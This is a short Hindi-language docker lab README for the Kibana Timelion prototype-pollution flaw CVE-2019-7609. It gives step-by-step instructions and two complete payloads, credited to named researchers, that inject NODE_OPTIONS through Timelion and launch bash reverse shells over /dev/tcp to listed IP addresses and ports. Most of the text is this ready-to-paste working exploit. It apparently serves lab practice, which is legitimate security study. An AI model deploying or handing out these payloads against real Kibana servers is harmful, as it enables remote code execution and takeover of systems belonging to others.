
kibana-7609 के लिए docker लैब सेटअप
kibana-7609 के लिए डॉकर लैब सेटअप
संदर्भ : https://github.com/mpgn/CVE-2019-7609
Kibana खोलें
निम्नलिखित पेलोड में से एक को Timelion विज़ुअलाइज़र में पेस्ट करें
रन पर क्लिक करें
बाएं पैनल पर Canvas पर क्लिक करें
आपका रिवर्स शेल पॉप अप हो जाना चाहिए! :)
@securityMB द्वारा पेलोड
.es(*).props(label.proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//') .props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')
@chybeta द्वारा पेलोड
.es(*).props(label.proto.env.AAAA='require("child_process").exec("bash -c 'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1'");//') .props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')